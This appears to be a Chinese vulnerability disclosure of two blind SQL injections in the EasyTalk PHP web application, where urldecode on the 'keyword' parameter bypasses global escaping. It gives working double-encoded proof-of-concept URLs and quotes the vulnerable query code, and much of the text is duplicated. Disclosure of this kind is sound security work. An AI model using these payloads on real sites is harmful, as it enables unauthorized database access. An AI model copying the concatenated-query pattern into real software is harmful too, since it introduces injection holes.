### 简要描述: easytalk两枚sql盲注 ### 详细说明: 1.Home\Lib\Action\SearchAction.class.php第22行代码中 $keyword=urldecode(trim(htmlspecialchars($_REQUEST['keyword']))); keyword参数进行了urldecode操作。绕过全局gpc的过滤,导致注入。由于字符限制导致注入较为鸡肋 http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 可输出数据 [<img src="https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg" alt="QQ截图20141008120750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg) http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg" alt="QQ截图20141008120808.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg) 无数据返回...
### 简要描述: easytalk两枚sql盲注 ### 详细说明: 1.Home\Lib\Action\SearchAction.class.php第22行代码中 $keyword=urldecode(trim(htmlspecialchars($_REQUEST['keyword']))); keyword参数进行了urldecode操作。绕过全局gpc的过滤,导致注入。由于字符限制导致注入较为鸡肋 http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 可输出数据 [<img src="https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg" alt="QQ截图20141008120750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg) http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg" alt="QQ截图20141008120808.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg) 无数据返回 2,http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 原理同上。urldecode导致绕过全局gpc ``` public function topic() { $keyword=$this->_get('keyword','urldecode'); if ($keyword) { $topic = D('Topic')->where("topicname='$keyword'")->find(); if ($topic) { $isfollow=D('Mytopic')->isfollow($topic['id'],$this->my['user_id']); $topicusers=D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select(); //getwidget $widget=M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select(); if ($widget) { foreach ($widget as $val) { $topicwidget[$val['widgettype']][]=$val; } } $this->assign('topicwidget',$topicwidget); } else { $count=$isfollow=0; } $this->assign('comefrom','topic'); $this->assign('keyword',$keyword); $this->assign('topic',$topic); $this->assign('topicusers',$topicusers); $this->assign('isfollow',$isfollow); $this->assign('subname','#'.$keyword.'#'); $this->display(); } else { header("location:".SITE_URL.'/?m=topic&a=index'); } } ``` http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 [<img src="https://images.seebug.org/upload/201410/08121229e2e94a531145d48d40b300a158c83633.jpg" alt="QQ截图20141008121147.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08121229e2e94a531145d48d40b300a158c83633.jpg) http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/081212480e4b10a4caa94b421764d8d809932ad8.jpg" alt="QQ截图20141008121203.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/081212480e4b10a4caa94b421764d8d809932ad8.jpg) ### 漏洞证明: 1.Home\Lib\Action\SearchAction.class.php第22行代码中 $keyword=urldecode(trim(htmlspecialchars($_REQUEST['keyword']))); keyword参数进行了urldecode操作。绕过全局gpc的过滤,导致注入。由于字符限制导致注入较为鸡肋 http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 可输出数据 [<img src="https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg" alt="QQ截图20141008120750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120835a40653803096428c22e702bb73a474e0.jpg) http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg" alt="QQ截图20141008120808.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08120848cf6ed0544f4e88bc2a659276068185ff.jpg) 无数据返回 2,http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 原理同上。urldecode导致绕过全局gpc ``` public function topic() { $keyword=$this->_get('keyword','urldecode'); if ($keyword) { $topic = D('Topic')->where("topicname='$keyword'")->find(); if ($topic) { $isfollow=D('Mytopic')->isfollow($topic['id'],$this->my['user_id']); $topicusers=D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select(); //getwidget $widget=M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select(); if ($widget) { foreach ($widget as $val) { $topicwidget[$val['widgettype']][]=$val; } } $this->assign('topicwidget',$topicwidget); } else { $count=$isfollow=0; } $this->assign('comefrom','topic'); $this->assign('keyword',$keyword); $this->assign('topic',$topic); $this->assign('topicusers',$topicusers); $this->assign('isfollow',$isfollow); $this->assign('subname','#'.$keyword.'#'); $this->display(); } else { header("location:".SITE_URL.'/?m=topic&a=index'); } } ``` http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 [<img src="https://images.seebug.org/upload/201410/08121229e2e94a531145d48d40b300a158c83633.jpg" alt="QQ截图20141008121147.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/08121229e2e94a531145d48d40b300a158c83633.jpg) http://127.0.0.1/easytalk/?m=topic&a=topic&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=4%23 [<img src="https://images.seebug.org/upload/201410/081212480e4b10a4caa94b421764d8d809932ad8.jpg" alt="QQ截图20141008121203.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/081212480e4b10a4caa94b421764d8d809932ad8.jpg)
